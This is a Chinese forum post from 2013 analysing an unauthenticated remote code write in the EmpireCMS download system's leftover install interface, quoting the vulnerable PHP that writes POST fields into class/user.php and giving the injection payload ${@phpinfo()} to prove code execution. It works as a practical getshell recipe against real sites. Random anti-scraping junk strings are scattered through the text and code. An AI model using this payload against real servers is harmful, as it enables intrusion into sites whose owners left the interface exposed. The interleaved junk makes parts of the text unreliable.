这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
& E1 }5 a/ T% f# q
6 E+ b' e9 Q' B* I2 v4 u+ `9 B; i) q4 c0 _. D4 K1 M
这是帝国的一套下载系统 如图* ^1 k8 V5 e' P% x$ c! f
ps(不需要任何账户和密码,直接写shell) " z" m" |6 U% T- g( u
由于很多站是由于下载要整合discuz 等等一些论坛....
+ B2 F, m0 `9 h# m" h2 v
7 U& L; D* C: `( w$ R" |而帝国他又有一个万能接口,如图 2 v2 B* a. x. n" s5 r! H0 R$ T4 M7 `
8 m+ O F: q F( F$ y% w5 o( C
8 ~6 y0 e) d0 ~/ a% I1 k! c" J1 P而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
9 g) [5 {, b+ ~. `+ C4 {, W4 q
% |4 Z8 c/ n( E" N6 E当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
+ R, u# v: Q( R4 c$ \) y
& h, c5 l' z8 l! @- Z7 { G在data/fun.php中的15行
9 i% |; S' g; g \0 g# m/ b6 x [; u5 Y
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {, x4 i: l2 i+ i; ^
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
+ q1 p( ~2 \. T% @5 m# k/ ~: \0 n* Y) h1 C# `/ ^% [
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
! ?8 s' |2 ~9 O) T) _: i, W' @/ k; q L
他将传进来的变量进行了切割,然后赋给了$filetext, ~1 S$ P s- ]8 T7 g7 j
# c: y$ g# n5 X0 {8 i然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
: \' P3 B0 Q) o) R4 E9 o! n, O* `
+ p1 x+ a9 D. a r* w( t/ e我们看看写入的结果,随便填一个 $ c8 k7 L* h; I
/ {7 m5 r# H' I4 \# |
! D5 X, D5 Y8 W7 ~1 E- N: a) h T g/ N
. M& w; k/ [ j* H
' H, O1 {5 a+ O7 `
3 s* S6 d- n: z$ Z. g- Z r
* z9 Q6 P+ `: c3 r* W/ p9 [. t ]% g2 ]. r& F' v8 [
! v; v' E' W/ J2 o0 R1 o" e
. u4 X) u, X4 D* x5 N" p
4 I% q! Y# [& u5 e: {) ?3 x6 F) I5 D; B; d7 B* |. o. q7 f
: h5 H2 l) ]& c5 p1 q) O6 R" J8 L9 F
; W+ a4 P8 i9 S/ Z, t$ w1 ]' ^
0 q, v% E! l* L" B
" l: s9 T8 S- z# L8 U8 y# L
& S! k' u4 @- Q' r! i" _. a$ Q, |, J2 J4 S3 R8 |: Q
9 ?1 i; \* \; B) {! s
/ m! \3 L, U8 K3 {4 V4 S所以我们淫荡点,写个${@phpinfo()}试试 ; U; U) Z6 t; [; p$ b
然后访问以下class/user.php这个文件
: g" K5 r6 \$ I( q# i9 y& U日了吧 $ U! H! L t8 S# M' d- l
- ?0 A+ { n9 a7 w" N" }; z$ a1 s1 |
& }0 e3 Y# y7 r% l
# G! }4 g% j& R) J) S: G
+ K0 ~+ {' }4 w; |+ q | 
发表于 2013-1-23 09:34:37
收藏
支持
反对